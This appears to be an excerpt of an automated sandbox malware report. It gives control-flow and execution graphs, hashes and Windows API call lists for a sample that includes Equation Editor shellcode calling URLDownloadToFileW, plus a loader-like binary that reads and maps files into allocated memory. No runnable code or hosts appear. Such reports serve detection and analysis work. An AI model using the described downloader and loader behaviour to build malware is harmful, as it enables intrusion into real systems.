                                                                    • Opcode Fuzzy Hash: 7b4514c50c6803db6e1acb15a029f5a29cf7c6a0b93d7e4af60678115a653edc
                                                                    • Instruction Fuzzy Hash: 8EF0C899D84A4211DB30F72C4A597EBAF619B51310FCCBC57A891042C6D55B9CF38E1A

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 57 36ae582-36ae58d 59 36ae593-36ae5f5 URLDownloadToFileW call 36ae5fe 57->59 60 36ae58e call 36ae5e1 57->60 72 36ae663-36ae66b call 36ae67b 59->72 73 36ae5f7 59->73 60->59 77 36ae670-36ae672 72->77 75 36ae5f9-36ae5fa 73->75 76 36ae662 73->76 75->77 78 36ae5fc-36ae625 call 36ae62c 75->78 76->72 79 36ae661 77->79 80 36ae674-36ae678 77->80 79->72
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.461593136.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                                                                    Similarity
                                                                    • API ID: DownloadFile
                                                                    • String ID:
                                                                    • API String ID: 1407266417-0
                                                                    • Opcode ID: f29df95d9a18c321981f5fff7f293e617125a0b35ad74671cee5925c83681e80
                                                                    • Instruction ID: 950a9c833ca6bbfa885129d192838e1b38e781579de916abf3ba0a2d66bf0d73
                                                                    • Opcode Fuzzy Hash: f29df95d9a18c321981f5fff7f293e617125a0b35ad74671cee5925c83681e80
                                                                    • Instruction Fuzzy Hash: 0211896584CBC12BC722D7781D6EB55BE612B93610F1CCACEA1850F0E3E3A69501CA66

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 84 36ae5e1-36ae5e3 URLDownloadToFileW 85 36ae5ea-36ae5f5 84->85 86 36ae5e5 call 36ae5fe 84->86 87 36ae663-36ae66b call 36ae67b 85->87 88 36ae5f7 85->88 86->85 92 36ae670-36ae672 87->92 90 36ae5f9-36ae5fa 88->90 91 36ae662 88->91 90->92 93 36ae5fc-36ae625 call 36ae62c 90->93 91->87 94 36ae661 92->94 95 36ae674-36ae678 92->95 94->87
                                                                    APIs
                                                                    • URLDownloadToFileW.URLMON(00000000,036AE593,?,00000000,00000000), ref: 036AE5E3
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.461593136.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                                                                    Similarity
                                                                    • API ID: DownloadFile
                                                                    • String ID:
                                                                    • API String ID: 1407266417-0
                                                                    • Opcode ID: fe65dfc41c474ed7c68a25bdd3244d0e817b4e5dc4d84330f277ae402f48056e
                                                                    • Instruction ID: 104d7e1d81acd80c759f02867b85e18a754e144f87e5c5522c3ac12818a7f70b
                                                                    • Opcode Fuzzy Hash: fe65dfc41c474ed7c68a25bdd3244d0e817b4e5dc4d84330f277ae402f48056e
                                                                    • Instruction Fuzzy Hash: B011AF3494474136C724F61C8D41F5BFB51ABC2710F48EC5AF1400D2C6E263EC638E19

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 99 36ae64c-36ae65e ExitProcess GetPEB 101 36ae661-36ae672 call 36ae67b 99->101 105 36ae674-36ae678 101->105
                                                                    APIs
                                                                    • ExitProcess.KERNEL32(00000000,?,036AE640,?,036AE624,?,036AE5EA), ref: 036AE651
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.461593136.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                                                                    Similarity
                                                                    • API ID: ExitProcess
                                                                    • String ID:
                                                                    • API String ID: 621844428-0
                                                                    • Opcode ID: e55ef30ae08b9a015fea4a6ff3e24b8599026409e8cd7a038f7e15e8fa1a622d
                                                                    • Instruction ID: 984a6990de313f0c96de8f7793509a0bce56459b35c21ac62aeddd810b878855
                                                                    • Opcode Fuzzy Hash: e55ef30ae08b9a015fea4a6ff3e24b8599026409e8cd7a038f7e15e8fa1a622d
                                                                    • Instruction Fuzzy Hash: B8D01771211A029FD204EB18CE80F27F76AFFC4711F14D668E5084B659C730ECA1CAA4

                                                                    Execution Graph

                                                                    Execution Coverage:3.3%
                                                                    Dynamic/Decrypted Code Coverage:2.2%
                                                                    Signature Coverage:4.3%
                                                                    Total number of Nodes:1574
                                                                    Total number of Limit Nodes:54
                                                                    execution_graph 80837 467046 80838 46705d 80837->80838 80848 467136 80837->80848 80839 4671a0 80838->80839 80840 46710d 80838->80840 80841 467199 80838->80841 80850 46706e 80838->80850 80843 41171a 77 API calls 80839->80843 80844 41171a 77 API calls 80840->80844 80871 40e380 VariantClear ctype 80841->80871 80856 4670f3 _memcpy_s 80843->80856 80844->80856 80845 4670d2 80847 41171a 77 API calls 80845->80847 80846 41171a 77 API calls 80846->80848 80849 4670d8 80847->80849 80869 443466 77 API calls 80849->80869 80855 4670a9 ctype 80850->80855 80857 41171a 80850->80857 80853 4670e8 80870 45efe7 79 API calls ctype 80853->80870 80855->80839 80855->80845 80855->80856 80856->80846 80859 411724 80857->80859 80860 41173e 80859->80860 80864 411740 std::bad_alloc::bad_alloc 80859->80864 80872 4138ba 80859->80872 80890 411afc 7 API calls __decode_pointer 80859->80890 80860->80855 80862 411766 80894 4116fd 69 API calls std::exception::exception 80862->80894 80864->80862 80891 411421 80864->80891 80865 411770 80895 41805b RaiseException 80865->80895 80868 41177e 80869->80853 80870->80856 80871->80839 80873 41396d 80872->80873 80879 4138cc 80872->80879 80903 411afc 7 API calls __decode_pointer 80873->80903 80875 4138dd 80875->80879 80896 418252 69 API calls 2 library calls 80875->80896 80897 4180a7 69 API calls 7 library calls 80875->80897 80898 411803 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 80875->80898 80876 413973 80904 417f23 69 API calls __getptd_noexit 80876->80904 80879->80875 80882 413929 RtlAllocateHeap 80879->80882 80884 413965 80879->80884 80885 413959 80879->80885 80888 41395e 80879->80888 80899 41386b 69 API calls 4 library calls 80879->80899 80900 411afc 7 API calls __decode_pointer 80879->80900 80882->80879 80884->80859 80901 417f23 69 API calls __getptd_noexit 80885->80901 80902 417f23 69 API calls __getptd_noexit 80888->80902 80890->80859 80905 4113e5 80891->80905 80893 41142e 80893->80862 80894->80865 80895->80868 80896->80875 80897->80875 80899->80879 80900->80879 80901->80888 80902->80884 80903->80876 80904->80884 80906 4113f1 __locking 80905->80906 80913 41181b 80906->80913 80912 411412 __locking 80912->80893 80939 418407 80913->80939 80915 4113f6 80916 4112fa 80915->80916 81004 4169e9 TlsGetValue 80916->81004 80919 4169e9 __decode_pointer 7 API calls 80920 41131e 80919->80920 80921 4113a1 80920->80921 81016 4170e7 70 API calls 4 library calls 80920->81016 80936 41141b 80921->80936 80923 41133c 80924 411388 80923->80924 80927 411357 80923->80927 80928 411366 80923->80928 80925 41696e __encode_pointer 7 API calls 80924->80925 80926 411396 80925->80926 80929 41696e __encode_pointer 7 API calls 80926->80929 81017 417047 75 API calls _realloc 80927->81017 80928->80921 80931 411360 80928->80931 80929->80921 80931->80928 80933 41137c 80931->80933 81018 417047 75 API calls _realloc 80931->81018 81019 41696e TlsGetValue 80933->81019 80934 411376 80934->80921 80934->80933 81033 411824 80936->81033 80940 41841c 80939->80940 80941 41842f EnterCriticalSection 80939->80941 80946 418344 80940->80946 80941->80915 80943 418422 80943->80941 80974 4117af 69 API calls 3 library calls 80943->80974 80945 41842e 80945->80941 80947 418350 __locking 80946->80947 80948 418360 80947->80948 80949 418378 80947->80949 80975 418252 69 API calls 2 library calls 80948->80975 80955 418386 __locking 80949->80955 80978 416fb6 80949->80978 80951 418365 80976 4180a7 69 API calls 7 library calls 80951->80976 80955->80943 80956 41836c 80977 411803 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 80956->80977 80957 4183a7 80960 418407 __lock 69 API calls 80957->80960 80958 418398 80984 417f23 69 API calls __getptd_noexit 80958->80984 80962 4183ae 80960->80962 80964 4183e2 80962->80964 80965 4183b6 80962->80965 80967 413a88 ___convertcp 69 API calls 80964->80967 80985 4189e6 InitializeCriticalSectionAndSpinCount __locking 80965->80985 80968 4183d3 80967->80968 81000 4183fe LeaveCriticalSection _doexit 80968->81000 80969 4183c1 80969->80968 80986 413a88 80969->80986 80972 4183cd 80999 417f23 69 API calls __getptd_noexit 80972->80999 80974->80945 80975->80951 80976->80956 80981 416fbf 80978->80981 80979 4138ba _malloc 68 API calls 80979->80981 80980 416ff5 80980->80957 80980->80958 80981->80979 80981->80980 80982 416fd6 Sleep 80981->80982 80983 416feb 80982->80983 80983->80980 80983->80981 80984->80955 80985->80969 80988 413a94 __locking 80986->80988 80987 413b0d __locking __dosmaperr 80987->80972 80988->80987 80989 413ad3 80988->80989 80990 418407 __lock 67 API calls 80988->80990 80989->80987 80991 413ae8 HeapFree 80989->80991 80995 413aab ___sbh_find_block 80990->80995 80991->80987 80992 413afa 80991->80992 81003 417f23 69 API calls __getptd_noexit 80992->81003 80994 413aff GetLastError 80994->80987 80998 413ac5 80995->80998 81001 419f9d __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 80995->81001 81002 413ade LeaveCriticalSection _doexit 80998->81002 80999->80968 81000->80955 81001->80998 81002->80989 81003->80994 81005 416a01 81004->81005 81006 416a22 GetModuleHandleW 81004->81006 81005->81006 81007 416a0b TlsGetValue 81005->81007 81008 416a32 81006->81008 81009 416a3d GetProcAddress 81006->81009 81013 416a16 81007->81013 81031 41177f Sleep GetModuleHandleW 81008->81031 81015 416a1a 81009->81015 81011 41130e 81011->80919 81012 416a4d RtlDecodePointer 81012->81011 81013->81006 81013->81015 81014 416a38 81014->81009 81014->81011 81015->81011 81015->81012 81016->80923 81017->80931 81018->80934 81020 4169a7 GetModuleHandleW 81019->81020 81021 416986 81019->81021 81022 4169c2 GetProcAddress 81020->81022 81023 4169b7 81020->81023 81021->81020 81024 416990 TlsGetValue 81021->81024 81026 41699f 81022->81026 81032 41177f Sleep GetModuleHandleW 81023->81032 81030 41699b 81024->81030 81028 4169d2 RtlEncodePointer 81026->81028 81029 4169da 81026->81029 81027 4169bd 81027->81022 81027->81029 81028->81029 81029->80924 81030->81020 81030->81026 81031->81014 81032->81027 81036 41832d LeaveCriticalSection 81033->81036 81035 411420 81035->80912 81036->81035 81037 4444e4 81042 40d900 81037->81042 81039 4444ee 81046 43723d 81039->81046 81041 444504 81043 40d917 81042->81043 81044 40d909 81042->81044 81043->81044 81045 40d91c CloseHandle 81043->81045 81044->81039 81045->81039 81047 40d900 CloseHandle 81046->81047 81048 437247 ctype 81047->81048 81048->81041 81049 3514590 81063 35121e0 81049->81063 81051 3514632 81066 3514480 81051->81066 81053 351465b CreateFileW 81055 35146af 81053->81055 81058 35146aa 81053->81058 81056 35146c6 VirtualAlloc 81055->81056 81055->81058 81057 35146e4 ReadFile 81056->81057 81056->81058 81057->81058 81059 35146ff 81057->81059 81060 3513480 12 API calls 81059->81060 81061 3514732 81060->81061 81062 3514755 ExitProcess 81061->81062 81062->81058 81069 3515660 GetPEB 81063->81069 81065 351286b 81065->81051 81067 3514489 Sleep 81066->81067 81068 3514497 81067->81068 81070 351568a 81069->81070 81070->81065 81071 4169e0 81072 41696e __encode_pointer 7 API calls 81071->81072 81073 4169e7 81072->81073 81074 444343 81077 444326 81074->81077 81076 44434e WriteFile 81078 444340 81077->81078 81079 4442c7 81077->81079 81078->81076 81084 40e190 SetFilePointerEx 81079->81084 81081 4442e0 SetFilePointerEx 81085 40e190 SetFilePointerEx 81081->81085 81083 4442ff 81083->81076 81084->81081 81085->81083 81086 46d22f 81089 46d098 81086->81089 81088 46d241 81090 46d0b5 81089->81090 81091 46d115 81090->81091 81092 46d0b9 81090->81092 81144 45c216 80 API calls 81091->81144 81093 41171a 77 API calls 81092->81093 81095 46d0c0 81093->81095 81097 46d0cc 81095->81097 81133 40d940 78 API calls 81095->81133 81096 46d126 81098 46d0f8 81096->81098 81104 46d142 81096->81104 81134 453063 81097->81134 81140 4092c0 81098->81140 81102 46d0fd 81102->81088 81105 46d1c8 81104->81105 81107 46d158 81104->81107 81157 4676a3 80 API calls 81105->81157 81110 453063 113 API calls 81107->81110 81108 46d0ea 81108->81104 81111 46d0ee 81108->81111 81124 46d15e 81110->81124 81111->81098 81139 44ade5 CloseHandle ctype 81111->81139 81112 46d1ce 81158 4444c2 SetFilePointerEx SetFilePointerEx WriteFile 81112->81158 81113 46d18d 81145 467fce 84 API calls 81113->81145 81115 46d196 81146 4013a0 81115->81146 81119 46d1e7 81122 4092c0 VariantClear 81119->81122 81131 46d194 81119->81131 81122->81131 81124->81113 81124->81115 81126 46d224 81126->81088 81127 46d1b8 81156 467fce 84 API calls 81127->81156 81128 40d900 CloseHandle 81130 46d216 81128->81130 81159 44ade5 CloseHandle ctype 81130->81159 81131->81126 81131->81128 81133->81097 81135 45306e 81134->81135 81136 45307a 81134->81136 81135->81136 81160 452e2a 113 API calls 5 library calls 81135->81160 81138 40dfa0 85 API calls 81136->81138 81138->81108 81139->81098 81141 4092c8 ctype 81140->81141 81142 429db0 VariantClear 81141->81142 81143 4092d5 ctype 81141->81143 81142->81143 81143->81102 81144->81096 81145->81131 81147 41171a 77 API calls 81146->81147 81148 4013c4 81147->81148 81161 401380 81148->81161 81151 40df50 81152 40df61 81151->81152 81153 40df56 81151->81153 81155 40d3b0 77 API calls 2 library calls 81152->81155 81164 404080 77 API calls _memcpy_s 81153->81164 81155->81127 81156->81131 81157->81112 81158->81119 81159->81126 81160->81136 81162 41171a 77 API calls 81161->81162 81163 401387 81162->81163 81163->81151 81164->81152 81165 3514b3b 81168 35147b0 81165->81168 81167 3514b87 81169 35121e0 GetPEB 81168->81169 81172 351484f 81169->81172 81171 3514880 CreateFileW 81171->81172 81178 351488d 81171->81178 81173 35148a9 VirtualAlloc 81172->81173 81172->81178 81179 35149b0 CloseHandle 81172->81179 81180 35149c0 VirtualFree 81172->81180 81181 35156c0 GetPEB 81172->81181 81174 35148ca ReadFile 81173->81174 81173->81178 81177 35148e8 VirtualAlloc 81174->81177 81174->81178 81175 3514aaa 81175->81167 81176 3514a9c VirtualFree 81176->81175 81177->81172 81177->81178 81178->81175 81178->81176 81179->81172 81180->81172 81182 35156ea 81181->81182 81182->81171 81183 40116e 81184 401119 DefWindowProcW 81183->81184 81185 429212 81190 410b90 81185->81190 81188 411421 __cinit 76 API calls 81189 42922f 81188->81189 81191 410b9a __write_nolock 81190->81191 81192 41171a 77 API calls 81191->81192 81193 410c31 GetModuleFileNameW 81192->81193 81207 413db0 81193->81207 81195 410c66 _wcsncat 81210 413e3c 81195->81210 81198 41171a 77 API calls 81199 410ca3 _wcscpy 81198->81199 81200 410cd1 RegOpenKeyExW 81199->81200 81201 429bc3 RegQueryValueExW 81200->81201 81202 410cf7 81200->81202 81203 429cd9 RegCloseKey 81201->81203 81205 429bf2 _wcscat _wcslen _wcsncpy 81201->81205 81202->81188 81204 41171a 77 API calls 81204->81205 81205->81204 81206 429cd8 81205->81206 81206->81203 81213 413b95 81207->81213 81243 41abec 81210->81243 81214 413c2f 81213->81214 81220 413bae 81213->81220 81215 413d60 81214->81215 81216 413d7b 81214->81216 81239 417f23 69 API calls __getptd_noexit 81215->81239 81241 417f23 69 API calls __getptd_noexit 81216->81241 81219 413d65 81222 413cfb 81219->81222 81240 417ebb 7 API calls 2 library calls 81219->81240 81220->81214 81224 413c1d 81220->81224 81235 41ab19 69 API calls __locking 81220->81235 81222->81195 81224->81214 81232 413c9b 81224->81232 81236 41ab19 69 API calls __locking 81224->81236 81225 413d03 81225->81214 81225->81222 81227 413d8e 81225->81227 81226 413cb9 81226->81214 81228 413cd6 81226->81228 81237 41ab19 69 API calls __locking 81226->81237 81242 41ab19 69 API calls __locking 81227->81242 81228->81214 81228->81222 81231 413cef 81228->81231 81238 41ab19 69 API calls __locking 81231->81238 81232->81225 81232->81226 81235->81224 81236->81232 81237->81228 81238->81222 81239->81219 81241->81219 81242->81222 81244 41ac02 81243->81244 81245 41abfd 81243->81245 81252 417f23 69 API calls __getptd_noexit 81244->81252 81245->81244 81249 41ac22 81245->81249 81247 41ac07 81253 417ebb 7 API calls 2 library calls 81247->81253 81251 410c99 81249->81251 81254 417f23 69 API calls __getptd_noexit 81249->81254 81251->81198 81252->81247 81254->81247 81255 401230 81256 401241 _memset 81255->81256 81257 4012c5 81255->81257 81270 401be0 81256->81270 81259 40126b 81260 4012ae KillTimer SetTimer 81259->81260 81261 42aa61 81259->81261 81262 401298 81259->81262 81260->81257 81263 42aa8b Shell_NotifyIconW 81261->81263 81264 42aa69 Shell_NotifyIconW 81261->81264 81265 4012a2 81262->81265 81266 42aaac 81262->81266 81263->81260 81264->81260 81265->81260 81269 42aaf8 Shell_NotifyIconW 81265->81269 81267 42aad7 Shell_NotifyIconW 81266->81267 81268 42aab5 Shell_NotifyIconW 81266->81268 81267->81260 81268->81260 81269->81260 81271 401bfb 81270->81271 81291 401cde 81270->81291 81272 4013a0 77 API calls 81271->81272 81273 401c0b 81272->81273 81274 42a9a0 LoadStringW 81273->81274 81275 401c18 81273->81275 81278 42a9bb 81274->81278 81292 4021e0 81275->81292 81277 401c2d 81280 401c3a 81277->81280 81281 42a9cd 81277->81281 81279 40df50 77 API calls 81278->81279 81282 401c53 _memset _wcscpy _wcsncpy 81279->81282 81280->81278 81283 401c44 81280->81283 81305 40d3b0 77 API calls 2 library calls 81281->81305 81290 401cc2 Shell_NotifyIconW 81282->81290 81304 40d3b0 77 API calls 2 library calls 81283->81304 81286 42a9dc 81286->81282 81287 42a9f0 81286->81287 81306 40d3b0 77 API calls 2 library calls 81287->81306 81289 42a9fe 81290->81291 81291->81259 81293 4021f1 _wcslen 81292->81293 81294 42a598 81292->81294 81297 402205 81293->81297 81298 402226 81293->81298 81308 40c740 81294->81308 81296 42a5a2 81307 404020 77 API calls ctype 81297->81307 81299 401380 77 API calls 81298->81299 81301 40222d 81299->81301 81301->81296 81302 41171a 77 API calls 81301->81302 81303 40220c _memcpy_s 81302->81303 81303->81277 81304->81282 81305->81286 81306->81289 81307->81303 81309 40c752 81308->81309 81310 40c747 81308->81310 81309->81296 81310->81309 81313 402ae0 81310->81313 81312 42a572 _memcpy_s 81312->81296 81314 42a06a 81313->81314 81315 402aef 81313->81315 81316 401380 77 API calls 81314->81316 81315->81312 81317 42a072 81316->81317 81318 41171a 77 API calls 81317->81318 81319 42a095 _memcpy_s 81318->81319 81319->81312 81320 4034b0 81321 4034b9 81320->81321 81322 4034bd 81320->81322 81323 41171a 77 API calls 81322->81323 81324 42a0ba 81322->81324 81325 4034fe _memcpy_s ctype 81323->81325 81326 416193 81363 41718c 81326->81363 81328 41619f GetStartupInfoW 81330 4161c2 81328->81330 81364 41aa31 HeapCreate 81330->81364 81332 416212 81366 416e29 GetModuleHandleW 81332->81366 81336 416223 __RTC_Initialize 81400 41b669 81336->81400 81339 416231 81340 41623d GetCommandLineW 81339->81340 81469 4117af 69 API calls 3 library calls 81339->81469 81415 42235f GetEnvironmentStringsW 81340->81415 81343 41623c 81343->81340 81344 41624c 81421 4222b1 GetModuleFileNameW 81344->81421 81346 416256 81347 416261 81346->81347 81470 4117af 69 API calls 3 library calls 81346->81470 81425 422082 81347->81425 81351 416272 81438 41186e 81351->81438 81354 416279 81356 416284 __wwincmdln 81354->81356 81472 4117af 69 API calls 3 library calls 81354->81472 81444 40d7f0 81356->81444 81359 4162b3 81474 411a4b 69 API calls _doexit 81359->81474 81362 4162b8 __locking 81363->81328 81365 416206 81364->81365 81365->81332 81467 41616a 69 API calls 3 library calls 81365->81467 81367 416e44 81366->81367 81368 416e3d 81366->81368 81369 416fac 81367->81369 81370 416e4e GetProcAddress GetProcAddress GetProcAddress GetProcAddress 81367->81370 81475 41177f Sleep GetModuleHandleW 81368->81475 81485 416ad5 72 API calls 2 library calls 81369->81485 81373 416e97 TlsAlloc 81370->81373 81372 416e43 81372->81367 81376 416218 81373->81376 81377 416ee5 TlsSetValue 81373->81377 81376->81336 81468 41616a 69 API calls 3 library calls 81376->81468 81377->81376 81378 416ef6 81377->81378 81476 411a69 7 API calls 4 library calls 81378->81476 81380 416efb 81381 41696e __encode_pointer 7 API calls 81380->81381 81382 416f06 81381->81382 81383 41696e __encode_pointer 7 API calls 81382->81383 81384 416f16 81383->81384 81385 41696e __encode_pointer 7 API calls 81384->81385 81386 416f26 81385->81386 81387 41696e __encode_pointer 7 API calls 81386->81387 81388 416f36 81387->81388 81477 41828b InitializeCriticalSectionAndSpinCount __alloc_osfhnd 81388->81477 81390 416f43 81390->81369 81391 4169e9 __decode_pointer 7 API calls 81390->81391 81392 416f57 81391->81392 81392->81369 81478 416ffb 81392->81478 81395 4169e9 __decode_pointer 7 API calls 81396 416f8a 81395->81396 81396->81369 81397 416f91 81396->81397 81484 416b12 69 API calls 5 library calls 81397->81484 81399 416f99 GetCurrentThreadId 81399->81376 81504 41718c 81400->81504 81402 41b675 GetStartupInfoA 81403 416ffb __calloc_crt 69 API calls 81402->81403 81404 41b696 81403->81404 81405 41b8b4 __locking 81404->81405 81408 416ffb __calloc_crt 69 API calls 81404->81408 81410 41b7fb 81404->81410 81411 41b77e 81404->81411 81405->81339 81406 41b831 GetStdHandle 81406->81410 81407 41b896 SetHandleCount 81407->81405 81408->81404 81409 41b843 GetFileType 81409->81410 81410->81405 81410->81406 81410->81407 81410->81409 81506 4189e6 InitializeCriticalSectionAndSpinCount __locking 81410->81506 81411->81405 81411->81410 81412 41b7a7 GetFileType 81411->81412 81505 4189e6 InitializeCriticalSectionAndSpinCount __locking 81411->81505 81412->81411 81416 422370 81415->81416 81417 422374 81415->81417 81416->81344 81418 416fb6 __malloc_crt 69 API calls 81417->81418 81419 422395 _memcpy_s 81418->81419 81420 42239c FreeEnvironmentStringsW 81419->81420 81420->81344 81422 4222e6 _wparse_cmdline 81421->81422 81423 416fb6 __malloc_crt 69 API calls 81422->81423 81424 422329 _wparse_cmdline 81422->81424 81423->81424 81424->81346 81426 42209a _wcslen 81425->81426 81430 416267 81425->81430 81427 416ffb __calloc_crt 69 API calls 81426->81427 81433 4220be _wcslen 81427->81433 81428 422123 81429 413a88 ___convertcp 69 API calls 81428->81429 81429->81430 81430->81351 81471 4117af 69 API calls 3 library calls 81430->81471 81431 416ffb __calloc_crt 69 API calls 81431->81433 81432 422149 81434 413a88 ___convertcp 69 API calls 81432->81434 81433->81428 81433->81430 81433->81431 81433->81432 81436 422108 81433->81436 81507 426349 69 API calls __locking 81433->81507 81434->81430 81436->81433 81508 417d93 10 API calls 3 library calls 81436->81508 81441 41187c __IsNonwritableInCurrentImage 81438->81441 81440 41189a __initterm_e 81442 411421 __cinit 76 API calls 81440->81442 81443 4118b9 __IsNonwritableInCurrentImage __initterm 81440->81443 81509 418486 81441->81509 81442->81443 81443->81354 81445 431bcb 81444->81445 81446 40d80c 81444->81446 81447 4092c0 VariantClear 81446->81447 81448 40d847 81447->81448 81513 40eb50 81448->81513 81451 40d877 81519 411ac6 81451->81519 81456 40d891 81529 40f370 KiUserCallbackDispatcher SystemParametersInfoW 81456->81529 81458 40d89f 81530 40d6d0 GetCurrentDirectoryW 81458->81530 81460 40d8a7 SystemParametersInfoW 81461 40d8d4 81460->81461 81462 40d8cd FreeLibrary 81460->81462 81463 4092c0 VariantClear 81461->81463 81462->81461 81464 40d8dd 81463->81464 81465 4092c0 VariantClear 81464->81465 81466 40d8e6 81465->81466 81466->81359 81473 411a1f 69 API calls _doexit 81466->81473 81467->81332 81468->81336 81469->81343 81470->81347 81471->81351 81472->81356 81473->81359 81474->81362 81475->81372 81476->81380 81477->81390 81479 417004 81478->81479 81481 416f70 81479->81481 81482 417022 Sleep 81479->81482 81486 422452 81479->81486 81481->81369 81481->81395 81483 417037 81482->81483 81483->81479 81483->81481 81484->81399 81485->81376 81487 42245e __locking 81486->81487 81488 422476 81487->81488 81498 422495 _memset 81487->81498 81499 417f23 69 API calls __getptd_noexit 81488->81499 81490 42247b 81500 417ebb 7 API calls 2 library calls 81490->81500 81491 422507 RtlAllocateHeap 81491->81498 81494 418407 __lock 68 API calls 81494->81498 81495 42248b __locking 81495->81479 81498->81491 81498->81494 81498->81495 81501 41a74c 5 API calls 2 library calls 81498->81501 81502 42254e LeaveCriticalSection _doexit 81498->81502 81503 411afc 7 API calls __decode_pointer 81498->81503 81499->81490 81501->81498 81502->81498 81503->81498 81504->81402 81505->81411 81506->81410 81507->81433 81508->81436 81510 41848c 81509->81510 81511 41696e __encode_pointer 7 API calls 81510->81511 81512 4184a4 81510->81512 81511->81510 81512->81440 81567 40eb70 81513->81567 81516 40eba0 81517 40eb50 2 API calls 81516->81517 81518 40eba5 81517->81518 81518->81451 81520 418407 __lock 69 API calls 81519->81520 81521 411ad3 81520->81521 81522 4169e9 __decode_pointer 7 API calls 81521->81522 81523 411ade 81522->81523 81524 41696e __encode_pointer 7 API calls 81523->81524 81525 411ae8 81524->81525 81571 41832d LeaveCriticalSection 81525->81571 81527 40d888 81528 411b24 69 API calls __locking 81527->81528 81528->81456 81529->81458 81572 401f80 81530->81572 81532 40d6f1 IsDebuggerPresent 81533 431a9d MessageBoxA 81532->81533 81534 40d6ff 81532->81534 81535 431ab6 81533->81535 81534->81535 81536 40d71f 81534->81536 81674 403e90 77 API calls 3 library calls 81535->81674 81642 40f3b0 81536->81642 81540 40d73a GetFullPathNameW 81672 401440 129 API calls _wcscat 81540->81672 81542 40d77a 81543 40d782 81542->81543 81544 431b09 SetCurrentDirectoryW 81542->81544 81545 40d78b 81543->81545 81675 43604b 6 API calls 81543->81675 81544->81543 81654 4101f0 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 81545->81654 81548 431b28 81548->81545 81551 431b30 GetModuleFileNameW 81548->81551 81553 431ba4 GetForegroundWindow ShellExecuteW 81551->81553 81554 431b4c 81551->81554 81552 40d795 81560 40d7a8 81552->81560 81662 40e1e0 81552->81662 81555 40d7c7 81553->81555 81676 401b70 81554->81676 81561 40d7d1 SetCurrentDirectoryW 81555->81561 81560->81555 81673 401000 Shell_NotifyIconW _memset 81560->81673 81561->81460 81562 431b66 81683 40d3b0 77 API calls 2 library calls 81562->81683 81565 431b72 GetForegroundWindow ShellExecuteW 81566 431b9f 81565->81566 81566->81555 81568 40d86e 81567->81568 81569 40eb76 LoadLibraryA 81567->81569 81568->81451 81568->81516 81569->81568 81570 40eb87 GetProcAddress 81569->81570 81570->81568 81571->81527 81684 40e680 81572->81684 81576 401fa2 GetModuleFileNameW 81702 40ff90 81576->81702 81578 401fbd 81714 4107b0 81578->81714 81581 401b70 77 API calls 81582 401fe4 81581->81582 81717 4019e0 81582->81717 81584 401ff2 81585 4092c0 VariantClear 81584->81585 81586 402002 81585->81586 81587 401b70 77 API calls 81586->81587 81588 40201c 81587->81588 81589 4019e0 78 API calls 81588->81589 81590 40202c 81589->81590 81591 401b70 77 API calls 81590->81591 81592 40203c 81591->81592 81725 40c3e0 81592->81725 81594 40204d 81743 40c060 81594->81743 81598 40206e 81755 4115d0 81598->81755 81601 42c174 81603 401a70 77 API calls 81601->81603 81602 402088 81604 4115d0 __wcsicoll 81 API calls 81602->81604 81605 42c189 81603->81605 81606 402093 81604->81606 81608 401a70 77 API calls 81605->81608 81606->81605 81607 40209e 81606->81607 81609 4115d0 __wcsicoll 81 API calls 81607->81609 81610 42c1a7 81608->81610 81611 4020a9 81609->81611 81612 42c1b0 GetModuleFileNameW 81610->81612 81611->81612 81613 4020b4 81611->81613 81615 401a70 77 API calls 81612->81615 81614 4115d0 __wcsicoll 81 API calls 81613->81614 81616 4020bf 81614->81616 81617 42c1e2 81615->81617 81621 42c20a _wcscpy 81616->81621 81622 401a70 77 API calls 81616->81622 81634 402107 81616->81634 81618 40df50 77 API calls 81617->81618 81619 42c1f1 81618->81619 81623 401a70 77 API calls 81619->81623 81620 402119 81624 42c243 81620->81624 81763 40e7e0 78 API calls 81620->81763 81628 401a70 77 API calls 81621->81628 81625 4020e5 _wcscpy 81622->81625 81626 42c201 81623->81626 81632 401a70 77 API calls 81625->81632 81626->81621 81637 402148 81628->81637 81629 402132 81764 40d030 78 API calls 81629->81764 81631 40213e 81633 4092c0 VariantClear 81631->81633 81632->81634 81633->81637 81634->81620 81634->81621 81635 402184 81639 4092c0 VariantClear 81635->81639 81637->81635 81640 401a70 77 API calls 81637->81640 81765 40d030 78 API calls 81637->81765 81766 40e640 78 API calls 81637->81766 81641 402196 ctype 81639->81641 81640->81637 81641->81532 81643 42ccf4 _memset 81642->81643 81644 40f3c9 81642->81644 81646 42cd05 GetOpenFileNameW 81643->81646 82448 40ffb0 78 API calls ctype 81644->82448 81646->81644 81649 40d732 81646->81649 81647 40f3d2 82449 410130 SHGetMalloc 81647->82449 81649->81540 81649->81542 81650 40f3d9 82454 410020 90 API calls __wcsicoll 81650->82454 81652 40f3e7 82455 40f400 81652->82455 81655 42b9d3 81654->81655 81656 41025a LoadImageW RegisterClassExW 81654->81656 82495 443e8f EnumResourceNamesW LoadImageW 81655->82495 82494 4102f0 7 API calls 81656->82494 81659 40d790 81661 4103e0 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 81659->81661 81660 42b9da 81661->81552 81664 40e207 _memset 81662->81664 81663 40e262 81665 40e2a4 81663->81665 82496 43737d 86 API calls __wcsicoll 81663->82496 81664->81663 81666 42aa14 DestroyIcon 81664->81666 81668 40e2c0 